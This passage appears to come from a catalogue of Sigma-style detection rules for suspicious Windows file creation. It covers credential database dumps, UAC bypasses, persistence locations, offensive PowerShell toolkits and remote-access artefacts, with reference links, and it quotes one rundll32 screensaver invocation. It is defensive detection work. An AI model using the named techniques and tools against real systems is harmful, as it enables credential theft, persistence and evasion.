https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/, https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml, https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008, https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html |
Suspicious File Creation In Uncommon AppData Folder |
Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs |
Internal Research |
SCR File Write Event |
Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example. |
https://lolbas-project.github.io/lolbas/Libraries/Desk/ |
Potential Persistence Via Notepad++ Plugins |
Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence |
https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/ |
NTDS.DIT Created |
Detects creation of a file named "ntds.dit" (Active Directory Database) |
Internal Research |
NTDS.DIT Creation By Uncommon Parent Process |
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory |
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://pentestlab.blog/tag/ntds-dit/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 |
NTDS.DIT Creation By Uncommon Process |
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory |
https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/, https://adsecurity.org/?p=2398 |
NTDS Exfiltration Filename Patterns |
Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration. |
https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb, https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1, https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405 |
Office Macro File Creation |
Detects the creation of a new office macro files on the systems |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference |
Potential Persistence Via Microsoft Office Add-In |
Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). |
Internal Research, https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence, https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md |
Office Macro File Download |
Detects the creation of a new office macro files on the systems via an application (browser, mail client). |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference |
Office Macro File Creation From Suspicious Process |
Detects the creation of a office macro file from a a suspicious process |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference |
OneNote Attachment File Dropped In Suspicious Location |
Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments |
https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ |
Suspicious File Created Via OneNote Application |
Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild |
https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/, https://twitter.com/MaD_c4t/status/1623414582382567424, https://labs.withsecure.com/publications/detecting-onenote-abuse, https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/, https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/ |
New Outlook Macro Created |
Detects the creation of a macro file for Outlook. |
https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ |
.RDP File Created by Outlook Process |
Detects the creation of files with the ".rdp" extensions in the temporary directory that Outlook uses when opening attachments.
This can be used to detect spear-phishing campaigns that use RDP files as attachments.
|
https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/, https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/, https://www.linkedin.com/feed/update/urn:li:ugcPost:7257437202706493443?commentUrn=urn%3Ali%3Acomment%3A%28ugcPost%3A7257437202706493443%2C7257522819985543168%29&dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287257522819985543168%2Curn%3Ali%3AugcPost%3A7257437202706493443%29 |
PCRE.NET Package Temp Files |
Detects processes creating temp files related to PCRE.NET package |
https://twitter.com/rbmaslen/status/1321859647091970051, https://twitter.com/tifkin_/status/1321916444557365248 |
Suspicious Outlook Macro Created |
Detects the creation of a macro file for Outlook. |
https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53, https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/ |
Publisher Attachment File Dropped In Suspicious Location |
Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents |
https://twitter.com/EmericNasi/status/1623224526220804098 |
Potential Persistence Via Microsoft Office Startup Folder |
Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence. |
https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies, https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders |
File With Uncommon Extension Created By An Office Application |
Detects the creation of files with an executable or script extension by an Office application. |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Uncommon File Created In Office Startup Folder |
Detects the creation of a file with an uncommon extension in an Office application startup folder |
https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/, http://addbalance.com/word/startup.htm, https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3, https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions |
Potential Persistence Via Outlook Form |
Detects the creation of a new Outlook form which can contain malicious code |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79, https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form, https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/ |
Suspicious File Created In PerfLogs |
Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files |
Internal Research, https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential Binary Or Script Dropper Via PowerShell |
Detects PowerShell creating a binary executable or a script file. |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
PowerShell Script Dropped Via PowerShell.EXE |
Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence. |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
Malicious PowerShell Scripts - FileCreation |
Detects the creation of known offensive powershell scripts used for exploitation |
https://github.com/PowerShellMafia/PowerSploit, https://github.com/NetSPI/PowerUpSQL, https://github.com/CsEnox/EventViewer-UACBypass, https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu, https://github.com/nettitude/Invoke-PowerThIEf, https://github.com/S3cur3Th1sSh1t/WinPwn, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon |
PowerShell Module File Created |
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. |
Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3 |
PowerShell Module File Created By Non-PowerShell Process |
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process |
Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3 |
Potential Suspicious PowerShell Module File Created |
Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder. |
Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3 |
Potential Startup Shortcut Persistence Via PowerShell.EXE |
Detects PowerShell writing startup shortcuts.
This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.
Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.
In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
|
https://redcanary.com/blog/intelligence-insights-october-2021/, https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder |
PSScriptPolicyTest Creation By Uncommon Process |
Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker. |
https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/ |
Rclone Config File Creation |
Detects Rclone config files being created |
https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ |
.RDP File Created By Uncommon Application |
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
|
https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ |
Potential Winnti Dropper Activity |
Detects files dropped by Winnti as described in RedMimicry Winnti playbook |
https://redmimicry.com/posts/redmimicry-winnti/#dropper |
PDF File Created By RegEdit.EXE |
Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process.
This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
|
https://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/ |
RemCom Service File Creation |
Detects default RemCom service filename which indicates RemCom service installation and execution |
https://github.com/kavika13/RemCom/ |
ScreenConnect Temporary Installation Artefact |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows |
Remote Access Tool - ScreenConnect Temporary File |
Detects the creation of files in a specific location by ScreenConnect RMM.
ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
|
https://github.com/SigmaHQ/sigma/pull/4467 |
Potential RipZip Attack on Startup Folder |
Detects a phishing attack which expands a ZIP file containing a malicious shortcut.
If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.
Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
|
https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19 |
Potential SAM Database Dump |
Detects the creation of files that look like exports of the local SAM (Security Account Manager) |
https://github.com/search?q=CVE-2021-36934, https://web.archive.org/web/20210725081645/https://github.com/cube0x0/CVE-2021-36934, https://www.google.com/search?q=%22reg.exe+save%22+sam, https://github.com/HuskyHacks/ShadowSteal, https://github.com/FireFart/hivenightmare |
Self Extraction Directive File Created In Potentially Suspicious Location |
Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
These files are used by the "iexpress.exe" utility in order to create self extracting packages.
Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
|
https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior |
Windows Shell/Scripting Application File Write to Suspicious Folder |
Detects Windows shells and scripting applications that write files to suspicious folders |
Internal Research |
Windows Binaries Write Suspicious Extensions |
Detects Windows executables that write files with suspicious extensions |
Internal Research |
Startup Folder File Write |
A General detection for files being created in the Windows startup directory. This could be an indicator of persistence. |
https://github.com/OTRF/detection-hackathon-apt29/issues/12, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md |
Suspicious Creation with Colorcpl |
Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\ |
https://twitter.com/eral4m/status/1480468728324231172?s=20 |
Created Files by Microsoft Sync Center |
This rule detects suspicious files created by Microsoft Sync Center (mobsync) |
https://redcanary.com/blog/intelligence-insights-november-2021/ |
Suspicious Files in Default GPO Folder |
Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder |
https://redcanary.com/blog/intelligence-insights-november-2021/ |
Suspicious Desktopimgdownldr Target File |
Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension |
https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/, https://twitter.com/SBousseaden/status/1278977301745741825 |
Suspicious desktop.ini Action |
Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. |
https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ |
Suspicious Creation TXT File in User Desktop |
Ransomware create txt file in the user Desktop |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note |
Creation of a Diagcab |
Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location) |
https://threadreaderapp.com/thread/1533879688141086720.html |
DPAPI Backup Keys And Certificate Export Activity IOC |
Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
|
https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/, https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.Common/Data/DPAPI/DPAPIBackupKey.cs#L28-L32 |
Suspicious Double Extension Files |
Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default. |
https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations, https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles, https://twitter.com/malwrhunterteam/status/1235135745611960321, https://twitter.com/luc4m/status/1073181154126254080 |
Suspicious MSExchangeMailboxReplication ASPX Write |
Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation |
https://redcanary.com/blog/blackbyte-ransomware/ |
Suspicious Executable File Creation |
Detect creation of suspicious executable file names.
Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
|
https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae, https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/ |
Suspicious Get-Variable.exe Creation |
Get-Variable is a valid PowerShell cmdlet
WindowsApps is by default in the path where PowerShell is executed.
So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
|
https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/, https://www.joesandbox.com/analysis/465533/0/html |
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream |
Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
|
https://twitter.com/pfiatde/status/1681977680688738305, https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/, https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/, https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3 |
Potential Homoglyph Attack Using Lookalike Characters in Filename |
Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
|
https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish, http://www.irongeek.com/homoglyph-attack-generator.php |
Legitimate Application Dropped Archive |
Detects programs on a Windows system that should not write an archive to disk |
https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326 |
Legitimate Application Dropped Executable |
Detects programs on a Windows system that should not write executables to disk |
https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326 |
Legitimate Application Dropped Script |
Detects programs on a Windows system that should not write scripts to disk |
https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326 |
Suspicious LNK Double Extension File Created |
Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
|
https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations, https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles, https://twitter.com/malwrhunterteam/status/1235135745611960321, https://twitter.com/luc4m/status/1073181154126254080 |
Suspicious PFX File Creation |
A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file. |
https://github.com/OTRF/detection-hackathon-apt29/issues/14, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md |
PowerShell Profile Modification |
Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence |
https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/, https://persistence-info.github.io/Data/powershellprofile.html |
Suspicious PROCEXP152.sys File Created In TMP |
Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.
This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
|
https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ |
Suspicious File Creation Activity From Fake Recycle.Bin Folder |
Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware |
https://www.mandiant.com/resources/blog/infected-usb-steal-secrets, https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/ |
Potential File Extension Spoofing Using Right-to-Left Override |
Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
|
https://redcanary.com/blog/right-to-left-override/, https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method |
Drop Binaries Into Spool Drivers Color Folder |
Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below |
https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ |
Suspicious Startup Folder Persistence |
Detects when a file with a suspicious extension is created in the startup folder |
https://github.com/last-byte/PersistenceSniper |
Suspicious Scheduled Task Write to System32 Tasks |
Detects the creation of tasks from processes executed from suspicious locations |
Internal Research |
Suspicious Interactive PowerShell as SYSTEM |
Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm |
TeamViewer Remote Session |
Detects the creation of log files during a TeamViewer remote session |
https://www.teamviewer.com/en-us/ |
VsCode Powershell Profile Modification |
Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2 |
Windows Terminal Profile Settings Modification By Uncommon Process |
Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process. |
https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile, https://twitter.com/nas_bench/status/1550836225652686848 |
WinSxS Executable File Creation By Non-System Process |
Detects the creation of binaries in the WinSxS folder by non-system processes |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
LiveKD Kernel Memory Dump File Created |
Detects the creation of a file that has the same name as the default LiveKD kernel memory dump. |
Internal Research |
LiveKD Driver Creation |
Detects the creation of the LiveKD driver, which is used for live kernel debugging |
Internal Research |
LiveKD Driver Creation By Uncommon Process |
Detects the creation of the LiveKD driver by a process image other than "livekd.exe". |
Internal Research |
Process Explorer Driver Creation By Non-Sysinternals Binary |
Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
|
https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer, https://github.com/Yaxser/Backstab, https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks, https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/ |
Process Monitor Driver Creation By Non-Sysinternals Binary |
Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself. |
Internal Research |
PsExec Service File Creation |
Detects default PsExec service filename which indicates PsExec service installation and execution |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
PSEXEC Remote Execution File Artefact |
Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system |
https://aboutdfir.com/the-key-to-identify-psexec/, https://twitter.com/davisrichardg/status/1616518800584704028 |
Potential Privilege Escalation Attempt Via .Exe.Local Technique |
Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" |
https://github.com/binderlabs/DirCreate2System, https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt |
LSASS Process Memory Dump Creation Via Taskmgr.EXE |
Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager. |
https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1 |
Hijack Legit RDP Session to Move Laterally |
Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder |
Internal Research |
UAC Bypass Using Consent and Comctl32 - File |
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using .NET Code Profiler on MMC |
Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using EventVwr |
Detects the pattern of a UAC bypass using Windows Event Viewer |
https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw, https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g, https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute |
UAC Bypass Using IDiagnostic Profile - File |
Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique |
https://github.com/Wh04m1001/IDiagnosticProfileUAC |
UAC Bypass Using IEInstal - File |
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using MSConfig Token Modification - File |
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using NTFS Reparse Point - File |
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) |
https://github.com/hfiref0x/UACME |
UAC Bypass Abusing Winsat Path Parsing - File |
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using Windows Media Player - File |
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) |
https://github.com/hfiref0x/UACME |
Creation of WerFault.exe/Wer.dll in Unusual Folder |
Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking. |
https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/ |
VHD Image Download Via Browser |
Detects creation of ".vhd"/".vhdx" files by browser processes.
Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
|
https://redcanary.com/blog/intelligence-insights-october-2021/, https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/, https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ |
Visual Studio Code Tunnel Remote File Creation |
Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
|
Internal Research |
Renamed VsCode Code Tunnel Execution - File Indicator |
Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
|
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html |
Potential Webshell Creation On Static Website |
Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell. |
PT ESC rule and personal experience, https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md |
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File |
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) |
https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 |
Wmiexec Default Output File |
Detects the creation of the default output filename used by the wmiexec tool |
